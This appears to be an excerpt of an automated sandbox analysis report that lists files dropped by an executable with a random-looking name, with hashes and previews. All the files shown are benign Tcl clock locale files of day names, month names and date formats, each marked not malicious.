                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ar_SY DAYS_OF_WEEK_ABBREV [list \.. "\u0627\u0644\u0623\u062d\u062f"\.. "\u0627\u0644\u0627\u062b\u0646\u064a\u0646"\.. "\u0627\u0644\u062b\u0644\u0627\u062b\u0627\u0621"\.. "\u0627\u0644\u0623\u0631\u0628\u0639\u0627\u0621"\.. "\u0627\u0644\u062e\u0645\u064a\u0633"\.. "\u0627\u0644\u062c\u0645\u0639\u0629"\.. "\u0627\u0644\u0633\u0628\u062a"].. ::msgcat::mcset ar_SY MONTHS_ABBREV [list \.. "\u0643\u0627\u0646\u0648\u0646 \u0627\u0644\u062b\u0627\u0646\u064a"\.. "\u0634\u0628\u0627\u0637"\.. "\u0622\u0630\u0627\u0631"\.. "\u0646\u064a\u0633\u0627\u0646"\.. "\u0646\u0648\u0627\u0631"\.. "\u062d\u0632\u064a\u0631\u0627\u0646"\.. "\u062a\u0645\u0648\u0632"\.. "\u0622\u0628"\.. "\u0623\u064a\u0644\u0648\u0644"\.. "\u062a\u0634\u0631\u064a\u0646 \u0627\u0644\u0623\u0648\u064
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2157
                                                                                                                                                                                                                              Entropy (8bit):4.27810535662921
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43PI8IKQGQ8mA/XxQJxQnA9QJlPyI/tbCaQICMIcQ8InVI5tNIzQFIQQLtChjsI4:2PItK5BSb9ajfycCW5IzdQNxK
                                                                                                                                                                                                                              MD5:6334BDDFC1E0EAE4DBB2C90F85818FD8
                                                                                                                                                                                                                              SHA1:085EDC3D027D6B5A6A6A2561717EA89C8F8B8B39
                                                                                                                                                                                                                              SHA-256:A636A82C7D00CCDC0AF2496043FFA320F17B0D48A1232708810D3BB1453E881E
                                                                                                                                                                                                                              SHA-512:18ADB77314FCFD534E55B234B3A53A0BC572AB60B80D099D2F3B20E0C5FE66179FDC076AA43200DB3CA123BC6216989EC41448FA624D3BA9633413AD8AD6034C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset be DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0434"\.. "\u043f\u043d"\.. "\u0430\u0442"\.. "\u0441\u0440"\.. "\u0447\u0446"\.. "\u043f\u0442"\.. "\u0441\u0431"].. ::msgcat::mcset be DAYS_OF_WEEK_FULL [list \.. "\u043d\u044f\u0434\u0437\u0435\u043b\u044f"\.. "\u043f\u0430\u043d\u044f\u0434\u0437\u0435\u043b\u0430\u043a"\.. "\u0430\u045e\u0442\u043e\u0440\u0430\u043a"\.. "\u0441\u0435\u0440\u0430\u0434\u0430"\.. "\u0447\u0430\u0446\u0432\u0435\u0440"\.. "\u043f\u044f\u0442\u043d\u0456\u0446\u0430"\.. "\u0441\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset be MONTHS_ABBREV [list \.. "\u0441\u0442\u0434"\.. "\u043b\u044e\u0442"\.. "\u0441\u043a\u0432"\.. "\u043a\u0440\u0441"\.. "\u043c\u0430\u0439"\.. "\u0447\u0440\u0432"\.. "\u043b\u043f\u043d"
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1871
                                                                                                                                                                                                                              Entropy (8bit):4.4251657008559935
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43EUAIlnQf/QVdQ81mnEZqEavWQEQ3QvQrQL0QjQTtQDCQSY4tqP:27xMk+nEZqE3biIYbUi+C9y
                                                                                                                                                                                                                              MD5:E5225D6478C60E2502D18698BB917677
                                                                                                                                                                                                                              SHA1:52D611CB5351FB873D2535246B3A3C1A37094023
                                                                                                                                                                                                                              SHA-256:CFE4E44A3A751F113847667EC9EA741E762BBDE0D4284822CB337DF0F92C1ACA
                                                                                                                                                                                                                              SHA-512:59AB167177101088057BF4EE0F70262987A2177ECB72C613CCAAE2F3E8D8B77F07D15DA5BE3B8728E23C31A1C9736030AA4036A8CD00A24791751A298B3A88B3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset bg DAYS_OF_WEEK_ABBREV [list \.. "\u041d\u0434"\.. "\u041f\u043d"\.. "\u0412\u0442"\.. "\u0421\u0440"\.. "\u0427\u0442"\.. "\u041f\u0442"\.. "\u0421\u0431"].. ::msgcat::mcset bg DAYS_OF_WEEK_FULL [list \.. "\u041d\u0435\u0434\u0435\u043b\u044f"\.. "\u041f\u043e\u043d\u0435\u0434\u0435\u043b\u043d\u0438\u043a"\.. "\u0412\u0442\u043e\u0440\u043d\u0438\u043a"\.. "\u0421\u0440\u044f\u0434\u0430"\.. "\u0427\u0435\u0442\u0432\u044a\u0440\u0442\u044a\u043a"\.. "\u041f\u0435\u0442\u044a\u043a"\.. "\u0421\u044a\u0431\u043e\u0442\u0430"].. ::msgcat::mcset bg MONTHS_ABBREV [list \.. "I"\.. "II"\.. "III"\.. "IV"\.. "V"\.. "VI"\.. "VII"\.. "VIII"\.. "IX"\.. "X"\.. "XI"\.. "XII"\.. ""].. ::msgcat::mcset bg MO
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2335
                                                                                                                                                                                                                              Entropy (8bit):4.107102006297273
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR835e/MWrD//6HFEVcVVcCVcTUTVckVEVcT7VcEEVcby/Vcn0VcMr/0VcM8VcQ:43ktX++QalMObalMZ6IE6V
                                                                                                                                                                                                                              MD5:5D25E7FC65824AC987535FEA14A4045C
                                                                                                                                                                                                                              SHA1:85C10F05823CD3263FC7B3EC38796BEC261B3716
                                                                                                                                                                                                                              SHA-256:890EA6521DEB1B3C3913CCD92562F6360E064DAEE2E2B0356A6DD97A46264A1F
                                                                                                                                                                                                                              SHA-512:5D8A88ACAEBBF3CD721F288FA0F1FEE517EE568CA5482E30CFA1E36CD37DF011C449090E2D9041F1D046A191F13D4C5C4B6F9E2F16FD259E63CE46ECC4E4F81F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset bn DAYS_OF_WEEK_ABBREV [list \.. "\u09b0\u09ac\u09bf"\.. "\u09b8\u09cb\u09ae"\.. "\u09ae\u0999\u0997\u09b2"\.. "\u09ac\u09c1\u09a7"\.. "\u09ac\u09c3\u09b9\u09b8\u09cd\u09aa\u09a4\u09bf"\.. "\u09b6\u09c1\u0995\u09cd\u09b0"\.. "\u09b6\u09a8\u09bf"].. ::msgcat::mcset bn DAYS_OF_WEEK_FULL [list \.. "\u09b0\u09ac\u09bf\u09ac\u09be\u09b0"\.. "\u09b8\u09cb\u09ae\u09ac\u09be\u09b0"\.. "\u09ae\u0999\u0997\u09b2\u09ac\u09be\u09b0"\.. "\u09ac\u09c1\u09a7\u09ac\u09be\u09b0"\.. "\u09ac\u09c3\u09b9\u09b8\u09cd\u09aa\u09a4\u09bf\u09ac\u09be\u09b0"\.. "\u09b6\u09c1\u0995\u09cd\u09b0\u09ac\u09be\u09b0"\.. "\u09b6\u09a8\u09bf\u09ac\u09be\u09b0"].. ::msgcat::mcset bn MONTHS_ABBREV [list \.. "\u099c\u09be\u09a8\u09c1\u09df\u09be\u09b0\u09c0"\.. "\u09ab\u09c7\u09ac\u09cd\u09b0\u09c1\u09df\u09be
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):265
                                                                                                                                                                                                                              Entropy (8bit):4.868201122972066
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xovtvfluo/E3v6xyFjovto+3vflm68vn:4EnLB383UtvfltE3v6g8tF3vflm6+n
                                                                                                                                                                                                                              MD5:B91BB2ABC23B90962D2070B9588F2AB5
                                                                                                                                                                                                                              SHA1:CBB4E9CD600773792C6E9F3E6B27E99C1846B44F
                                                                                                                                                                                                                              SHA-256:B3D8A4632290B0F3DA690E47C1FDF06A8B9E171A96E938AFDB0DD52CF806CE54
                                                                                                                                                                                                                              SHA-512:932FC4B8C3CA72731187D56012AD7DD7777C4D447F16EEB17B9D68235C9590DF99992FD22B8D7C85A843A610F93CD36FAFA993C34C441255A1C0A93C73BC5FE4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset bn_IN DATE_FORMAT "%A %d %b %Y".. ::msgcat::mcset bn_IN TIME_FORMAT_12 "%I:%M:%S %z".. ::msgcat::mcset bn_IN DATE_TIME_FORMAT "%A %d %b %Y %I:%M:%S %z %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1152
                                                                                                                                                                                                                              Entropy (8bit):4.2880653012847985
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83FMVBNfPg+g+RjMu5+C6MB4zdiwvWvn:432g6jh65zd3gn
                                                                                                                                                                                                                              MD5:72DDD60C907DD235BCE4AB0A5AEE902C
                                                                                                                                                                                                                              SHA1:06150F793251687E6FBC3FDA3BC81BCBFC7DE763
                                                                                                                                                                                                                              SHA-256:3BE295DCC8FCDC767FED0C68E3867359C18E7E57D7DB6C07236B5BC572AD328E
                                                                                                                                                                                                                              SHA-512:3B0A85003692F1E46185D5CC09236D2DA5E6D29166C9812D07A7D6BF6AC6C3B0708F91C6899768D4DBA3528081B8B43E09F49622B70F1CF991AFAC5352B6BA37
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ca DAYS_OF_WEEK_ABBREV [list \.. "dg."\.. "dl."\.. "dt."\.. "dc."\.. "dj."\.. "dv."\.. "ds."].. ::msgcat::mcset ca DAYS_OF_WEEK_FULL [list \.. "diumenge"\.. "dilluns"\.. "dimarts"\.. "dimecres"\.. "dijous"\.. "divendres"\.. "dissabte"].. ::msgcat::mcset ca MONTHS_ABBREV [list \.. "gen."\.. "feb."\.. "mar\u00e7"\.. "abr."\.. "maig"\.. "juny"\.. "jul."\.. "ag."\.. "set."\.. "oct."\.. "nov."\.. "des."\.. ""].. ::msgcat::mcset ca MONTHS_FULL [list \.. "gener"\.. "febrer"\.. "mar\u00e7"\.. "abril"\.. "maig"\.. "juny"\.. "juliol"\.. "agost"\.. "setembre"\.. "octubre"\.. "novembre"\.. "desembre"\.. ""].. ::msg
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1354
                                                                                                                                                                                                                              Entropy (8bit):4.466447248030554
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83U4nZ4yJTkkG3mYWEZqO1R3DNBEVG+PYhxrU4UF3ecCvt7/v3e6:43TJTGmnEZqE5/EVEDOGtDp
                                                                                                                                                                                                                              MD5:F32EAD82CC26754C5A8E092873A28DB3
                                                                                                                                                                                                                              SHA1:325124660F62242B24623B4B737CB4616F86CFF3
                                                                                                                                                                                                                              SHA-256:AFEA12A16A6FA750EA610245133B90F178BA714848F89AEC37429A3E7B06BE1A
                                                                                                                                                                                                                              SHA-512:04E335AAFBF4D169983635FC87BCFFE86FBA570A3E1820D20240EF7B47E7A3CD94AE3598543DCE92A1F82B5146CAAD982EFE9490EFD9E581D58515CFC3930581
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset cs DAYS_OF_WEEK_ABBREV [list \.. "Ne"\.. "Po"\.. "\u00dat"\.. "St"\.. "\u010ct"\.. "P\u00e1"\.. "So"].. ::msgcat::mcset cs DAYS_OF_WEEK_FULL [list \.. "Ned\u011ble"\.. "Pond\u011bl\u00ed"\.. "\u00dater\u00fd"\.. "St\u0159eda"\.. "\u010ctvrtek"\.. "P\u00e1tek"\.. "Sobota"].. ::msgcat::mcset cs MONTHS_ABBREV [list \.. "I"\.. "II"\.. "III"\.. "IV"\.. "V"\.. "VI"\.. "VII"\.. "VIII"\.. "IX"\.. "X"\.. "XI"\.. "XII"\.. ""].. ::msgcat::mcset cs MONTHS_FULL [list \.. "leden"\.. "\u00fanor"\.. "b\u0159ezen"\.. "duben"\.. "kv\u011bten"\.. "\u010derven"\.. "\u010dervenec"\.. "srpen"\.. "z\u00e1\u0159\u00ed"\.. "\u0159\u00edjen"\..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1208
                                                                                                                                                                                                                              Entropy (8bit):4.315504392809956
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83wV0tBVYuorIsmZ5meAxyISjTHU92WFVwpwvbvT:43w+DiuorreAY0zw8rT
                                                                                                                                                                                                                              MD5:27A6A8BE8903AEF9D0BE956906A89583
                                                                                                                                                                                                                              SHA1:EE29FDF67CB3AE150DF6BBBE603C1C3F5DA28641
                                                                                                                                                                                                                              SHA-256:0D422A991BCA13FE9033118691CFEDAB0F372222EBB0BC92BAF8E914EE816B84
                                                                                                                                                                                                                              SHA-512:0E702A679AD94BF479226B7DE32077562F3F95210F6453AE564138386DBB179941BA5359AEE9AC532F4A6E5BE745D6962D6B638A21DD48B865716F2FD2A0CB01
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset da DAYS_OF_WEEK_ABBREV [list \.. "s\u00f8"\.. "ma"\.. "ti"\.. "on"\.. "to"\.. "fr"\.. "l\u00f8"].. ::msgcat::mcset da DAYS_OF_WEEK_FULL [list \.. "s\u00f8ndag"\.. "mandag"\.. "tirsdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "l\u00f8rdag"].. ::msgcat::mcset da MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset da MONTHS_FULL [list \.. "januar"\.. "februar"\.. "marts"\.. "april"\.. "maj"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat::mcset da B
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1276
                                                                                                                                                                                                                              Entropy (8bit):4.349293509679722
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83cFNSsZKKgXum47fpK2OaSIui7dHqWZ0ZIBFJWJvvvWIn:43InZKKgXoOqx1W67W9XWIn
                                                                                                                                                                                                                              MD5:EE3963A5F7E29C05C9617BE3FD897114
                                                                                                                                                                                                                              SHA1:0F978CA174DF596817F872B5EF1B447B9DFE651C
                                                                                                                                                                                                                              SHA-256:4C27733502066E8391654D1D372F92BF0484C5A3821E121AE8AA5B99378C99AE
                                                                                                                                                                                                                              SHA-512:EA933709C68F8199858A1CC1FFDA67EE7458CC57A163E672535EB0B4C37BFDC200604C7506748DAC3158B6CA63C2F076A2C6252B2A596E59F83D3B1D4BC9C901
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset de DAYS_OF_WEEK_ABBREV [list \.. "So"\.. "Mo"\.. "Di"\.. "Mi"\.. "Do"\.. "Fr"\.. "Sa"].. ::msgcat::mcset de DAYS_OF_WEEK_FULL [list \.. "Sonntag"\.. "Montag"\.. "Dienstag"\.. "Mittwoch"\.. "Donnerstag"\.. "Freitag"\.. "Samstag"].. ::msgcat::mcset de MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mrz"\.. "Apr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset de MONTHS_FULL [list \.. "Januar"\.. "Februar"\.. "M\u00e4rz"\.. "April"\.. "Mai"\.. "Juni"\.. "Juli"\.. "August"\.. "September"\.. "Oktober"\.. "November"\.. "Dezember"\.. ""].. ::msgcat::mcset de BCE "v.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):847
                                                                                                                                                                                                                              Entropy (8bit):4.412930056658995
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR831sMm47fpK2++SIui7dHqWZ0ZItovGvzvW:431h+mx1Wm+QjW
                                                                                                                                                                                                                              MD5:A6227CD4F7434952D093F1F3C64B4378
                                                                                                                                                                                                                              SHA1:0DDB9A49CB83DDF2396B2ECA85093260710496C2
                                                                                                                                                                                                                              SHA-256:1C02D14140196623297F858E2EEF00B4159E1C6FAFE044EC65A48C9C24D46540
                                                                                                                                                                                                                              SHA-512:D63F34024356F5CE0335D14EA557F4BBF238CCA8265DD27C039C70F7F28FE737F368B030DEE10B2C536512D2815E1F5B19838D08745C6A76A39050D573597EB3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset de_AT MONTHS_ABBREV [list \.. "J\u00e4n"\.. "Feb"\.. "M\u00e4r"\.. "Apr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset de_AT MONTHS_FULL [list \.. "J\u00e4nner"\.. "Februar"\.. "M\u00e4rz"\.. "April"\.. "Mai"\.. "Juni"\.. "Juli"\.. "August"\.. "September"\.. "Oktober"\.. "November"\.. "Dezember"\.. ""].. ::msgcat::mcset de_AT DATE_FORMAT "%Y-%m-%d".. ::msgcat::mcset de_AT TIME_FORMAT "%T".. ::msgcat::mcset de_AT TIME_FORMAT_12 "%T".. ::msgcat::mcset de_AT DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1276
                                                                                                                                                                                                                              Entropy (8bit):4.389082225723362
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83B8VSysVB8VsZKKgJ5Mm47fpK26aSIui7dHqWZ0ZIlj5VevjevbDvW:43Bt1VBbZKKgJs6qx1Wc5VojobzW
                                                                                                                                                                                                                              MD5:C351057D8E5328C0790901D1F4DBEC9F
                                                                                                                                                                                                                              SHA1:F73DE8AEF7F8083B0726760AA003E81067A68588
                                                                                                                                                                                                                              SHA-256:532845CD15EC821C1939D000C648694A64E8CA8F0C14BAD5D79682CF991481CE
                                                                                                                                                                                                                              SHA-512:8152AD082D0A6A4EBE7E1CCA9D4A5F2E48ABE3F09F4385A517C523A67CA3B08E0F20C193D0F6850F37E55ED0CD6FBD201FE22CC824AF170976D04DB061212F2D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset de_BE DAYS_OF_WEEK_ABBREV [list \.. "Son"\.. "Mon"\.. "Die"\.. "Mit"\.. "Don"\.. "Fre"\.. "Sam"].. ::msgcat::mcset de_BE DAYS_OF_WEEK_FULL [list \.. "Sonntag"\.. "Montag"\.. "Dienstag"\.. "Mittwoch"\.. "Donnerstag"\.. "Freitag"\.. "Samstag"].. ::msgcat::mcset de_BE MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "M\u00e4r"\.. "Apr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset de_BE MONTHS_FULL [list \.. "Januar"\.. "Februar"\.. "M\u00e4rz"\.. "April"\.. "Mai"\.. "Juni"\.. "Juli"\.. "August"\.. "September"\.. "Oktober"\.. "November"\.. "Dezember"\.. ""].. ::m
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2304
                                                                                                                                                                                                                              Entropy (8bit):4.371322909589862
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR833v+ZYYWtv+nWfFyL1NYOg+EKVJQ19tWQYmYaYRn9sWuSAJIJ6eRa6WrmdlX:43/pZyLjY0uYR9QmdkjC9r
                                                                                                                                                                                                                              MD5:7DD14B1F4FF532DCAF6D4C6F0DF82E9A
                                                                                                                                                                                                                              SHA1:707875FEF4207EBB71D066FDC54C7F68560C6DAD
                                                                                                                                                                                                                              SHA-256:8B23E0E2F0F319BB9A2DFDCCDC565FF79A62FA85094811189B6BC41594232B6B
                                                                                                                                                                                                                              SHA-512:5ECA072DE5DD7890270AE268C7C8D40EE2DB6966643604D16E54194DB0AD74FDA8D04848331E61B387E8B494AF18252E38671D939069EC4C90C672A629563B88
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset el DAYS_OF_WEEK_ABBREV [list \.. "\u039a\u03c5\u03c1"\.. "\u0394\u03b5\u03c5"\.. "\u03a4\u03c1\u03b9"\.. "\u03a4\u03b5\u03c4"\.. "\u03a0\u03b5\u03bc"\.. "\u03a0\u03b1\u03c1"\.. "\u03a3\u03b1\u03b2"].. ::msgcat::mcset el DAYS_OF_WEEK_FULL [list \.. "\u039a\u03c5\u03c1\u03b9\u03b1\u03ba\u03ae"\.. "\u0394\u03b5\u03c5\u03c4\u03ad\u03c1\u03b1"\.. "\u03a4\u03c1\u03af\u03c4\u03b7"\.. "\u03a4\u03b5\u03c4\u03ac\u03c1\u03c4\u03b7"\.. "\u03a0\u03ad\u03bc\u03c0\u03c4\u03b7"\.. "\u03a0\u03b1\u03c1\u03b1\u03c3\u03ba\u03b5\u03c5\u03ae"\.. "\u03a3\u03ac\u03b2\u03b2\u03b1\u03c4\u03bf"].. ::msgcat::mcset el MONTHS_ABBREV [list \.. "\u0399\u03b1\u03bd"\.. "\u03a6\u03b5\u03b2"\.. "\u039c\u03b1\u03c1"\.. "\u0391\u03c0\u03c1"\.. "\u039c\u03b1\u03ca"\.. "\u0399\u03bf\u
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):307
                                                                                                                                                                                                                              Entropy (8bit):4.896073290907262
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoCwmGjbmvFjoCws6W3v1oCws6W3v6p6HyFjoCwmT+3vjbe:4EnLB383QrmdSs6W3vss6W3v6QSoJ3ve
                                                                                                                                                                                                                              MD5:5B31AD8AC0000B01C4BD04BF6FC4784C
                                                                                                                                                                                                                              SHA1:F55145B473DDCAE38A0F7297D58B80B12B2A5271
                                                                                                                                                                                                                              SHA-256:705C66C14B6DE682EC7408EABDBA0800C626629E64458971BC8A4CBD3D5DB111
                                                                                                                                                                                                                              SHA-512:1CCE6BCAE5D1F7D80E10687F0BCA2AE1B2DD53F04A0F443DC9B552804D60E708E64326B62BA4E3787325D89837B4AC8CCCA9AF6F39CBD654BCC8A9C27EA63BB8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_AU DATE_FORMAT "%e/%m/%Y".. ::msgcat::mcset en_AU TIME_FORMAT "%H:%M:%S".. ::msgcat::mcset en_AU TIME_FORMAT_12 "%I:%M:%S %P %z".. ::msgcat::mcset en_AU DATE_TIME_FORMAT "%e/%m/%Y %H:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):312
                                                                                                                                                                                                                              Entropy (8bit):4.870560620756039
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoCr3FuoCsX3vtfNrsoCsX3v6YNIdjoCs+3v3FnN9vn:4EnLB383H3Fb3vtNN3v6y43v3FnNNn
                                                                                                                                                                                                                              MD5:DDA87ACED97F9F7771788A1A0A1E4433
                                                                                                                                                                                                                              SHA1:E221653CD659C095098180344654770FF059331B
                                                                                                                                                                                                                              SHA-256:BC87754A253C1036E423FA553DA182DBC56F62A13EDA811D8CD9E8AFA40404A6
                                                                                                                                                                                                                              SHA-512:BB95D9241B05686CA15C413746DD06071635CB070F38847BE9702397A86C01A3D54DEBE1ACAA51834AB74DB8D0F75E353995183864E382721425756EE46B0B1E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_BE DATE_FORMAT "%d %b %Y".. ::msgcat::mcset en_BE TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset en_BE TIME_FORMAT_12 "%k h %M min %S s %z".. ::msgcat::mcset en_BE DATE_TIME_FORMAT "%d %b %Y %k:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.915769170926952
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xosmGMoss6W3v6ay/5osmT+3vR6HyFvn:4EnLB383hr8s6W3v6ay/hJ3voSVn
                                                                                                                                                                                                                              MD5:4CBF90CE15ECCB6B695AA78D7D659454
                                                                                                                                                                                                                              SHA1:30C26ADB03978C5E7288B964A14B692813D6E0B8
                                                                                                                                                                                                                              SHA-256:EC48F18995D46F82B1CC71EA285174505A50E3BA2017BCCE2D807149B7543FD0
                                                                                                                                                                                                                              SHA-512:CC809EBD1B2B5D9E918C2E2CE4E7075DFB0744C583F17C1C234D8437EF0C34654D2F09FF77544AD3430CEC78ABC70AA5F85F71AD1489A687B8087FCDFE07B088
